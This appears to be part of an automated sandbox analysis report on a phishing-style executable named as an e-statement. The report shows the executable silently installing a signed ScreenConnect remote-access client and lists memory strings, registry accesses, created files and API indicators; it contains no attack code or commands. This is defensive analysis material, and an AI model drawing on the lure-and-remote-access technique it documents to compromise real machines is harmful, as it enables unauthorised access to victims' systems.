                                  Source: svchost.exe, 00000009.00000003.1792401984.000001470DEDD000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                  Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1710376148.0000000002931000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3573482500.0000000002513000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832786752.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: rundll32.exe, 00000004.00000003.1729285999.0000000004EFB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729474688.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729285999.0000000004E8C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                  Source: rundll32.exe, 00000004.00000003.1729285999.0000000004EFB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729474688.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729285999.0000000004E8C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/news/
                                  Source: rundll32.exe, 00000004.00000003.1729285999.0000000004EFB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729474688.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729285999.0000000004E8C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/releases/
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: svchost.exe, 00000009.00000003.1792401984.000001470DF52000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                                  Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                  Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                                  Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                  Source: svchost.exe, 00000009.00000003.1792401984.000001470DF52000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                                  Source: svchost.exe, 00000009.00000003.1792401984.000001470DF52000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                                  Source: edb.log.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                                  System Summary

                                  barindex
                                  Source: estatement020134230003.exe.virus.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_05EA0240 CreateProcessAsUserW,7_2_05EA0240
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\577f6a.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{F4AC94C9-4954-76D1-AA9E-1F00F1476998}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8342.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8362.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8567.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\577f6c.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\577f6c.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F4AC94C9-4954-76D1-AA9E-1F00F1476998}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F4AC94C9-4954-76D1-AA9E-1F00F1476998}\DefaultIconJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.SchedServiceConfig.rmiJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (8d1a70ac1b2b845c)Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (8d1a70ac1b2b845c)\2ujelutc.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (8d1a70ac1b2b845c)\2ujelutc.newcfgJump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI8362.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_05828D907_2_05828D90
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_058274A07_2_058274A0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_0582E3787_2_0582E378
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_058274A07_2_058274A0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_0582E3787_2_0582E378
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3470DD8_2_00007FFD9B3470DD
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3410CF8_2_00007FFD9B3410CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3410D78_2_00007FFD9B3410D7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3524978_2_00007FFD9B352497
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B66438D8_2_00007FFD9B66438D
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B65924F8_2_00007FFD9B65924F
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6577E78_2_00007FFD9B6577E7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6565A68_2_00007FFD9B6565A6
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B65EAFA8_2_00007FFD9B65EAFA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B652A408_2_00007FFD9B652A40
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6610CF8_2_00007FFD9B6610CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B65B6D18_2_00007FFD9B65B6D1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B33700810_2_00007FFD9B337008
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B3310CF10_2_00007FFD9B3310CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B3310D710_2_00007FFD9B3310D7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B646F9710_2_00007FFD9B646F97
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B64F2D210_2_00007FFD9B64F2D2
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B642E9910_2_00007FFD9B642E99
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B64E52610_2_00007FFD9B64E526
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B64E02910_2_00007FFD9B64E029
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1718857284.0000000003AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1736958396.0000000004FE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1699653527.000000000150F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1699653527.000000000150F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1737608274.00000000050B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1737608274.00000000050B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1737608274.00000000050B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1710376148.000000000321A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1710376148.000000000321A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1710376148.000000000321A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1710141542.0000000000F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1749830288.0000000007594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1749830288.0000000007594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1699653527.0000000000FE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1699653527.0000000000FE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1699653527.0000000000FE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1699653527.0000000000FE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1699653527.0000000000FE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1737512340.0000000005090000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1739173914.000000000542C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1739173914.000000000542C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1739173914.000000000542C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1739173914.000000000542C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenamezlib.dll2 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenamewixca.dll\ vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.0.estatement020134230003.exe.virus.exe.fe63d4.2.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.2.estatement020134230003.exe.virus.exe.4fe0000.5.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.0.estatement020134230003.exe.virus.exe.106c3d4.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.2.estatement020134230003.exe.virus.exe.50b0000.7.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.estatement020134230003.exe.virus.exe.106c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.0.estatement020134230003.exe.virus.exe.106c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.0.estatement020134230003.exe.virus.exe.106c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
